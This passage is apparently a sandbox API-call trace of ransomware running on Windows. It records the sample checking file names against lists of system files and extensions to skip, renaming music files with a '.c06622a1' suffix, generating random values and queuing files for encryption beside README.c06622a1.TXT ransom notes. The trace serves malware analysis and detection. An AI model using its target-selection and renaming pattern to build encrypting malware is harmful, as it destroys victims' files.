_wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.866] wcslen (_String="ani") returned 0x3 [0150.866] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.866] wcslen (_String="bat") returned 0x3 [0150.866] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.866] wcslen (_String="bin") returned 0x3 [0150.866] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.866] wcslen (_String="cab") returned 0x3 [0150.866] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.866] wcslen (_String="cmd") returned 0x3 [0150.866] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.866] wcslen (_String="com") returned 0x3 [0150.866] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.866] wcslen (_String="cpl") returned 0x3 [0150.867] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.867] wcslen (_String="cur") returned 0x3 [0150.867] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.867] wcslen (_String="deskthemepack") returned 0xd [0150.867] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.867] wcslen (_String="diagcab") returned 0x7 [0150.867] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.867] wcslen (_String="diagcfg") returned 0x7 [0150.867] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.867] wcslen (_String="diagpkg") returned 0x7 [0150.867] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.867] wcslen (_String="dll") returned 0x3 [0150.867] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.867] wcslen (_String="drv") returned 0x3 [0150.867] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.867] wcslen (_String="exe") returned 0x3 [0150.867] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.867] wcslen (_String="hlp") returned 0x3 [0150.867] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.867] wcslen (_String="icl") returned 0x3 [0150.867] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.867] wcslen (_String="icns") returned 0x4 [0150.867] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.867] wcslen (_String="ico") returned 0x3 [0150.867] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.868] wcslen (_String="ics") returned 0x3 [0150.868] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.868] wcslen (_String="idx") returned 0x3 [0150.868] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.868] wcslen (_String="ldf") returned 0x3 [0150.868] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.868] wcslen (_String="lnk") returned 0x3 [0150.868] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.868] wcslen (_String="mod") returned 0x3 [0150.868] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.868] wcslen (_String="mpa") returned 0x3 [0150.868] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.868] wcslen (_String="msc") returned 0x3 [0150.868] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.868] wcslen (_String="msp") returned 0x3 [0150.868] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.868] wcslen (_String="msstyles") returned 0x8 [0150.868] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.868] wcslen (_String="msu") returned 0x3 [0150.868] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.868] wcslen (_String="nls") returned 0x3 [0150.868] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.868] wcslen (_String="nomedia") returned 0x7 [0150.868] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.868] wcslen (_String="ocx") returned 0x3 [0150.868] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.868] wcslen (_String="prf") returned 0x3 [0150.868] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.868] wcslen (_String="ps1") returned 0x3 [0150.868] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.868] wcslen (_String="rom") returned 0x3 [0150.868] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.868] wcslen (_String="rtp") returned 0x3 [0150.868] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.868] wcslen (_String="scr") returned 0x3 [0150.868] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.868] wcslen (_String="shs") returned 0x3 [0150.868] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.869] wcslen (_String="spl") returned 0x3 [0150.869] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.869] wcslen (_String="sys") returned 0x3 [0150.869] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.869] wcslen (_String="theme") returned 0x5 [0150.869] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.869] wcslen (_String="themepack") returned 0x9 [0150.869] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.869] wcslen (_String="wpx") returned 0x3 [0150.869] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.869] wcslen (_String="lock") returned 0x4 [0150.869] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.869] wcslen (_String="key") returned 0x3 [0150.869] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.869] wcslen (_String="hta") returned 0x3 [0150.869] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.869] wcslen (_String="msi") returned 0x3 [0150.869] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.869] wcslen (_String="pdb") returned 0x3 [0150.869] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.869] wcslen (_String="sql") returned 0x3 [0150.869] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.869] wcslen (_String="sqlite") returned 0x6 [0150.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 0x10 [0150.869] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0150.869] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" [0150.869] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned 0x69 [0150.869] wcscpy (in: _Dest=0x45901ac, _Source="qWi.m4a" | out: _Dest="qWi.m4a") returned="qWi.m4a" [0150.869] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a", dwFileAttributes=0x80) returned 1 [0150.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\qwi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0150.870] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.870] ReadFile (in: hFile=0x610, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0150.871] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0x35353dba [0150.871] RtlComputeCrc32 (PartialCrc=0x3dba, Buffer=0x3fe174, Length=0x80) returned 0xa92bb1aa [0150.871] RtlComputeCrc32 (PartialCrc=0xb1aa, Buffer=0x3fe174, Length=0x80) returned 0xe9692f06 [0150.871] RtlComputeCrc32 (PartialCrc=0x2f06, Buffer=0x3fe174, Length=0x80) returned 0x41264daa [0150.871] RtlComputeCrc32 (PartialCrc=0x4daa, Buffer=0x3fe174, Length=0x80) returned 0x72ca5f5b [0150.871] CloseHandle (hObject=0x610) returned 1 [0150.871] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0150.871] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a" [0150.871] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a") returned 0x71 [0150.871] wcscpy (in: _Dest=0x45a01c2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.871] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\qwi.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\qwi.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\qWi.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\qwi.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0150.873] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.873] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0150.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54ff47b3 [0150.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x300a51ee [0150.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x70ef6b09 [0150.879] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe42e282 [0150.879] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77ce7f78 [0150.879] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76fe4ca7 [0150.879] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x22fa684f [0150.879] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1adc60f1 [0150.882] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x3da4ed1 [0150.882] RtlComputeCrc32 (PartialCrc=0x4ed1, Buffer=0x41f0094, Length=0x80) returned 0x8f05aa0b [0150.882] RtlComputeCrc32 (PartialCrc=0xaa0b, Buffer=0x41f0094, Length=0x80) returned 0xb229a79e [0150.882] RtlComputeCrc32 (PartialCrc=0xa79e, Buffer=0x41f0094, Length=0x80) returned 0xb7c266f5 [0150.882] RtlComputeCrc32 (PartialCrc=0x66f5, Buffer=0x41f0094, Length=0x80) returned 0xb86f7a1b [0150.882] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0150.882] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0150.882] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0150.882] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8603fc0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd8603fc0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd8603fc0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.882] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.882] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.882] FindClose (in: hFindFile=0x2db8840 | out: hFindFile=0x2db8840) returned 1 [0150.882] _wcsicmp (_Str1="backup", _Str2="JZVBOKxj2eLEEdPiA") returned -8 [0150.882] wcslen (_String="backup") returned 0x6 [0150.882] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0150.883] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0150.884] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8591ba0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd8591ba0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd8591ba0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.884] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.884] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fcec570, ftCreationTime.dwHighDateTime=0x1d5e038, ftLastAccessTime.dwLowDateTime=0xe748f520, ftLastAccessTime.dwHighDateTime=0x1d5e62e, ftLastWriteTime.dwLowDateTime=0xe748f520, ftLastWriteTime.dwHighDateTime=0x1d5e62e, nFileSizeHigh=0x0, nFileSizeLow=0xfb33, dwReserved0=0x0, dwReserved1=0x0, cFileName="XIUHvad VlT72LhL.mp3", cAlternateFileName="XIUHVA~1.MP3")) returned 1 [0150.884] _wcsicmp (_Str1="XIUHvad VlT72LhL.mp3", _Str2="README.c06622a1.TXT") returned 6 [0150.884] wcsstr (_Str="XIUHvad VlT72LhL.mp3", _SubStr="README") returned 0x0 [0150.884] _wcsicmp (_Str1="autorun.inf", _Str2="XIUHvad VlT72LhL.mp3") returned -23 [0150.884] wcslen (_String="autorun.inf") returned 0xb [0150.884] _wcsicmp (_Str1="boot.ini", _Str2="XIUHvad VlT72LhL.mp3") returned -22 [0150.884] wcslen (_String="boot.ini") returned 0x8 [0150.884] _wcsicmp (_Str1="bootfont.bin", _Str2="XIUHvad VlT72LhL.mp3") returned -22 [0150.884] wcslen (_String="bootfont.bin") returned 0xc [0150.884] _wcsicmp (_Str1="bootsect.bak", _Str2="XIUHvad VlT72LhL.mp3") returned -22 [0150.884] wcslen (_String="bootsect.bak") returned 0xc [0150.884] _wcsicmp (_Str1="desktop.ini", _Str2="XIUHvad VlT72LhL.mp3") returned -20 [0150.884] wcslen (_String="desktop.ini") returned 0xb [0150.884] _wcsicmp (_Str1="iconcache.db", _Str2="XIUHvad VlT72LhL.mp3") returned -15 [0150.884] wcslen (_String="iconcache.db") returned 0xc [0150.884] _wcsicmp (_Str1="ntldr", _Str2="XIUHvad VlT72LhL.mp3") returned -10 [0150.884] wcslen (_String="ntldr") returned 0x5 [0150.884] _wcsicmp (_Str1="ntuser.dat", _Str2="XIUHvad VlT72LhL.mp3") returned -10 [0150.884] wcslen (_String="ntuser.dat") returned 0xa [0150.884] _wcsicmp (_Str1="ntuser.dat.log", _Str2="XIUHvad VlT72LhL.mp3") returned -10 [0150.884] wcslen (_String="ntuser.dat.log") returned 0xe [0150.884] _wcsicmp (_Str1="ntuser.ini", _Str2="XIUHvad VlT72LhL.mp3") returned -10 [0150.884] wcslen (_String="ntuser.ini") returned 0xa [0150.884] _wcsicmp (_Str1="thumbs.db", _Str2="XIUHvad VlT72LhL.mp3") returned -4 [0150.884] wcslen (_String="thumbs.db") returned 0x9 [0150.884] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0150.884] wcslen (_String="386") returned 0x3 [0150.884] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0150.884] wcslen (_String="adv") returned 0x3 [0150.884] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0150.884] wcslen (_String="ani") returned 0x3 [0150.884] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0150.884] wcslen (_String="bat") returned 0x3 [0150.884] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0150.885] wcslen (_String="bin") returned 0x3 [0150.885] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0150.885] wcslen (_String="cab") returned 0x3 [0150.885] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0150.885] wcslen (_String="cmd") returned 0x3 [0150.885] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0150.885] wcslen (_String="com") returned 0x3 [0150.885] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0150.885] wcslen (_String="cpl") returned 0x3 [0150.885] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0150.885] wcslen (_String="cur") returned 0x3 [0150.885] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0150.885] wcslen (_String="deskthemepack") returned 0xd [0150.885] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0150.885] wcslen (_String="diagcab") returned 0x7 [0150.885] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0150.885] wcslen (_String="diagcfg") returned 0x7 [0150.885] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0150.885] wcslen (_String="diagpkg") returned 0x7 [0150.885] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0150.885] wcslen (_String="dll") returned 0x3 [0150.885] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0150.885] wcslen (_String="drv") returned 0x3 [0150.885] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0150.885] wcslen (_String="exe") returned 0x3 [0150.885] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0150.885] wcslen (_String="hlp") returned 0x3 [0150.885] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0150.885] wcslen (_String="icl") returned 0x3 [0150.885] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0150.885] wcslen (_String="icns") returned 0x4 [0150.885] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0150.885] wcslen (_String="ico") returned 0x3 [0150.885] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0150.885] wcslen (_String="ics") returned 0x3 [0150.885] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0150.886] wcslen (_String="idx") returned 0x3 [0150.886] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0150.886] wcslen (_String="ldf") returned 0x3 [0150.886] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0150.886] wcslen (_String="lnk") returned 0x3 [0150.886] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0150.886] wcslen (_String="mod") returned 0x3 [0150.886] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0150.886] wcslen (_String="mpa") returned 0x3 [0150.886] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0150.886] wcslen (_String="msc") returned 0x3 [0150.886] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0150.886] wcslen (_String="msp") returned 0x3 [0150.886] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0150.886] wcslen (_String="msstyles") returned 0x8 [0150.886] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0150.886] wcslen (_String="msu") returned 0x3 [0150.886] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0150.886] wcslen (_String="nls") returned 0x3 [0150.886] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0150.886] wcslen (_String="nomedia") returned 0x7 [0150.886] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0150.886] wcslen (_String="ocx") returned 0x3 [0150.886] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0150.886] wcslen (_String="prf") returned 0x3 [0150.886] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0150.886] wcslen (_String="ps1") returned 0x3 [0150.886] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0150.886] wcslen (_String="rom") returned 0x3 [0150.886] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0150.886] wcslen (_String="rtp") returned 0x3 [0150.886] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0150.886] wcslen (_String="scr") returned 0x3 [0150.886] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0150.886] wcslen (_String="shs") returned 0x3 [0150.886] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0150.886] wcslen (_String="spl") returned 0x3 [0150.887] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0150.887] wcslen (_String="sys") returned 0x3 [0150.887] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0150.887] wcslen (_String="theme") returned 0x5 [0150.887] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0150.887] wcslen (_String="themepack") returned 0x9 [0150.887] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0150.887] wcslen (_String="wpx") returned 0x3 [0150.887] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0150.887] wcslen (_String="lock") returned 0x4 [0150.887] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0150.887] wcslen (_String="key") returned 0x3 [0150.887] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0150.887] wcslen (_String="hta") returned 0x3 [0150.887] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0150.887] wcslen (_String="msi") returned 0x3 [0150.887] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0150.887] wcslen (_String="pdb") returned 0x3 [0150.887] _wcsicmp (_Str1="sql", _Str2="mp3") returned 6 [0150.887] wcslen (_String="sql") returned 0x3 [0150.887] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0150.887] wcslen (_String="sqlite") returned 0x6 [0150.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s")) returned 0x10 [0150.887] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0150.888] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" [0150.888] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S") returned 0x57 [0150.888] wcscpy (in: _Dest=0x4560170, _Source="XIUHvad VlT72LhL.mp3" | out: _Dest="XIUHvad VlT72LhL.mp3") returned="XIUHvad VlT72LhL.mp3" [0150.888] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3", dwFileAttributes=0x80) returned 1 [0150.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\xiuhvad vlt72lhl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0150.888] SetFilePointerEx (in: hFile=0x67c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.888] ReadFile (in: hFile=0x67c, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0150.889] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x701cd0e8 [0150.889] RtlComputeCrc32 (PartialCrc=0xd0e8, Buffer=0x3fe3f4, Length=0x80) returned 0x6edb57a5 [0150.889] RtlComputeCrc32 (PartialCrc=0x57a5, Buffer=0x3fe3f4, Length=0x80) returned 0x562d3d16 [0150.889] RtlComputeCrc32 (PartialCrc=0x3d16, Buffer=0x3fe3f4, Length=0x80) returned 0x27e8d62f [0150.889] RtlComputeCrc32 (PartialCrc=0xd62f, 